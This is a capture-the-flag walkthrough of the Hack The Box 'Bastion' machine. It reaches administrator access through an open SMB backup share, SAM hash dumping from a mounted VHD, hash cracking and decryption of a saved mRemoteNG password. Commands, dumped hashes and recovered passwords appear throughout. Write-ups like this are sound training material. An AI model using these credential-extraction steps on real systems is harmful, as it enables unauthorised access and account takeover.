HTB - Bastion
Getting Root:
Enumerate SMB and find access to Backups directory
Mount *.vhd file found on the backups folder and get SAM and SYSTEM files
Crack the hash for user and ssh to the box
mRemoteNG is installed in the box which stores saved session passwords using static string
Decrypt the stored Administrator password using a tool from GitHub
SSH to the box using the Administrator account
Nmap
# Nmap 7.80 scan initiated Wed Mar 4 23:29:48 2020 as: nmap -sC -sV -p- -oA nmap/Bastion 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.045s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -17m43s, deviation: 34m35s, median: 2m13s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-03-05T05:33:50+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-05T04:33:46
|_ start_date: 2020-03-04T11:34:41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 4 23:31:40 2020 -- 1 IP address (1 host up) scanned in 112.85 secondsEnumerating SMB
Looks like we can read IPC$, and we have READ and WRITE access to the Backups directory.
smbmap -H 10.10.10.134 -d BASTION -u 'justme'
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Backups READ, WRITE
C$ NO ACCESS Default share
.
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-2ec-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1d0-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-370-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-358-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 openssh-ssh-agent
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 trkwks
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-608-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-25c-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-254-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-5b8-0
IPC$ READ ONLY Remote IPC
Mount the remote share
mkdir smbfiles
mount -t cifs //10.10.10.134/Backups smbfiles/
Password for root@//10.10.10.134/Backups: # Just hit enter
root@kdeali:~/HackTheBox/Bastion# cd smbfiles/
root@kdeali:~/HackTheBox/Bastion/smbfiles# ls
etlLxkiRzT note.txt pmQWhHvsDA SDT65CB.tmp WindowsImageBackup
Interesting Files
Enumerating the Backups directory shows two .vhd files (virtual hard drives)
ls -l
total 5330560
-rwxr-xr-x 1 root root 37761024 Feb 22 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 1186 Feb 22 2019 BackupSpecs.xml
-rwxr-xr-x 1 root root 1078 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root 8930 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rwxr-xr-x 1 root root 6542 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root 2894 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root 1488 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root 1484 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root 3844 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root 3988 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root 7110 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root 2374620 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
Mounting VHD (Virtual Hard drives)
# Make a directory to mount the VHD
mkdir vhd
# Using guestmount to mount the VHD
guestmount --v i -r -a /root/HackTheBox/Bastion/smbfiles/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd vhd/
# guestmount info and help:
guestmount: FUSE module for libguestfs
guestmount lets you mount a virtual machine filesystem
Copyright (C) 2009-2019 Red Hat Inc.
Usage:
guestmount [--options] mountpoint
Options:
-a|--add image Add image
-c|--connect uri Specify libvirt URI for -d option
--dir-cache-timeout Set readdir cache timeout (default 5 sec)
-d|--domain guest Add disks from libvirt guest
--echo-keys Don't turn off echo for passphrases
--fd=FD Write to pipe FD when mountpoint is ready
--format[=raw|..] Force disk format for -a option
--fuse-help Display extra FUSE options
-i|--inspector Automatically mount filesystems
--help Display help message and exit
--key selector Specify a LUKS key
--keys-from-stdin Read passphrases from stdin
--live Connect to a live virtual machine
-m|--mount dev[:mnt[:opts[:fstype]] Mount dev on mnt (if omitted, /)
--no-fork Don't daemonize
-n|--no-sync Don't autosync
-o|--option opt Pass extra option to FUSE
--pid-file filename Write PID to filename
-r|--ro Mount read-only
--selinux For backwards compat only, does nothing
-v|--verbose Verbose messages
-V|--version Display version and exit
-w|--rw Mount read-write
-x|--trace Trace guestfs API calls
Getting a hashdump from the image
# cd Windows/System32/config/
root@kdeali:~/HackTheBox/Bastion/vhd/Windows/System32/config# ls -la
total 74740
drwxrwxrwx 1 root root 12288 Feb 22 2019 .
drwxrwxrwx 1 root root 655360 Feb 22 2019 ..
-rwxrwxrwx 2 root root 28672 Feb 22 2019 BCD-Template
-rwxrwxrwx 2 root root 25600 Feb 22 2019 BCD-Template.LOG
-rwxrwxrwx 2 root root 30932992 Feb 22 2019 COMPONENTS
-rwxrwxrwx 2 root root 1048576 Feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms
-rwxrwxrwx 2 root root 1048576 Feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms
-rwxrwxrwx 2 root root 1048576 Feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms
-rwxrwxrwx 2 root root 65536 Feb 22 2019 COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf
-rwxrwxrwx 2 root root 65536 Feb 22 2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf
-rwxrwxrwx 2 root root 524288 Feb 22 2019 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
-rwxrwxrwx 2 root root 524288 Jul 14 2009 COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
-rwxrwxrwx 2 root root 1024 Apr 11 2011 COMPONENTS.LOG
-rwxrwxrwx 2 root root 262144 Feb 22 2019 COMPONENTS.LOG1
-rwxrwxrwx 2 root root 0 Jul 13 2009 COMPONENTS.LOG2
-rwxrwxrwx 1 root root 262144 Feb 22 2019 DEFAULT
-rwxrwxrwx 1 root root 1024 Apr 11 2011 DEFAULT.LOG
-rwxrwxrwx 2 root root 91136 Feb 22 2019 DEFAULT.LOG1
-rwxrwxrwx 2 root root 0 Jul 13 2009 DEFAULT.LOG2
drwxrwxrwx 1 root root 0 Jul 13 2009 Journal
drwxrwxrwx 1 root root 0 Feb 22 2019 RegBack
-rwxrwxrwx 1 root root 262144 Feb 22 2019 SAM
-rwxrwxrwx 1 root root 1024 Apr 11 2011 SAM.LOG
-rwxrwxrwx 2 root root 21504 Feb 22 2019 SAM.LOG1
-rwxrwxrwx 2 root root 0 Jul 13 2009 SAM.LOG2
-rwxrwxrwx 1 root root 262144 Feb 22 2019 SECURITY
-rwxrwxrwx 1 root root 1024 Apr 11 2011 SECURITY.LOG
-rwxrwxrwx 2 root root 21504 Feb 22 2019 SECURITY.LOG1
-rwxrwxrwx 2 root root 0 Jul 13 2009 SECURITY.LOG2
-rwxrwxrwx 1 root root 24117248 Feb 22 2019 SOFTWARE
-rwxrwxrwx 1 root root 1024 Apr 11 2011 SOFTWARE.LOG
-rwxrwxrwx 2 root root 262144 Feb 22 2019 SOFTWARE.LOG1
-rwxrwxrwx 2 root root 0 Jul 13 2009 SOFTWARE.LOG2
-rwxrwxrwx 1 root root 9699328 Feb 22 2019 SYSTEM
-rwxrwxrwx 1 root root 1024 Apr 11 2011 SYSTEM.LOG
-rwxrwxrwx 2 root root 262144 Feb 22 2019 SYSTEM.LOG1
-rwxrwxrwx 2 root root 0 Jul 13 2009 SYSTEM.LOG2
drwxrwxrwx 1 root root 4096 Nov 20 2010 systemprofile
drwxrwxrwx 1 root root 4096 Feb 22 2019 TxR
# Copy the SAM and SYSTEM files to your directoryUsing the impacket secresdump
We get the hashes for the user L4mpje because the Administrator hash is empty. This can be recognized by the 31d6 of the admin hash.
# impacket-secretsdump -sam SAM -system SYSTEM local
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
Cracking the Hash
I used hashes.org which is a free online password recovery tool and submitted the hash for user L4mpje and I got he following:
26112010952d963c8dc4217daec986d9:bureaulampje
Getting the User Flag
As noted on the output of the nmap results, this is a windows box but it is running ssh.
# ssh L4mpje@10.10.10.134
L4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir /a
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\Desktop
22-02-2019 15:27 <DIR> .
22-02-2019 15:27 <DIR> ..
22-02-2019 15:26 282 desktop.ini
23-02-2019 09:07 32 user.txt
2 File(s) 314 bytes
2 Dir(s) 11.316.252.672 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop> Privilege Escalation
There is an application called mRemoteNG installed.
l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming>dir /a
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of c:\Users\L4mpje\AppData\Roaming
22-02-2019 14:01 <DIR> .
22-02-2019 14:01 <DIR> ..
22-02-2019 13:50 <DIR> Adobe
22-02-2019 13:52 <DIR> Microsoft
22-02-2019 14:03 <DIR> mRemoteNG
0 File(s) 0 bytes
5 Dir(s) 11.315.810.304 bytes free Exploiting mRemoteNG
A quick google on "mRemoteNG exploit" return the following article detailing how abuse the poor encryption on this application.
Getting the passwords from the encrypted config
I found the following tool on github. You can read the source code. It's safe
To run the script, you the password string which is located in the following directory:
c:\Users\L4mpje\AppData\Roaming\mRemoteNG
All you have to do is read the latest xml backup file and get the string.
l4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir /a
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
# Directory of c:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 14:03 <DIR> .
22-02-2019 14:03 <DIR> ..
22-02-2019 14:03 6.316 confCons.xml
22-02-2019 14:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 14:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 14:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 14:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 14:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 14:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 14:03 51 extApps.xml
22-02-2019 14:03 5.217 mRemoteNG.log
22-02-2019 14:03 2.245 pnlLayout.xml
22-02-2019 14:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 11.315.810.304 bytes free
# Reading the xml file and extracting the password string
4mpje@BASTION c:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml.20190222-1403486580.backup
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GC
M" KdfIterations="1000" FullFileEncryption="false" Protected="GZFZvMqKVfqaCb4DYaCJLOWP1D4TOix6kvJPpP9n9I3iY0wKUddxnQJSKIHscF4BXR
nHhScKnXECGoEau8Y7coTs" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Userna
me="Administrator" Domain="" Password="IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg=="
Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
# The string is encoded in base64:
Password="IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg=="
Decrypting the Password
# ./mremoteng_decrypt.py -s IsAizowTqaCAO6/2vMwxFtln1qfh+jZfdAI2V7Uve8JoLSRanAXzwFgMkkJbedGpCjRZbdmQIV299FlDCt8ymg==
Password: thXLHM96BeKL0ER2Getting the Root Flag
# ssh Administrator@10.10.10.134
Administrator@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator
administrator@BASTION C:\Users\Administrator>cd desktop
administrator@BASTION C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\Administrator\Desktop
23-02-2019 09:40 <DIR> .
23-02-2019 09:40 <DIR> ..
23-02-2019 09:07 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 11.315.679.232 bytes free
administrator@BASTION C:\Users\Administrator\Desktop> Last updated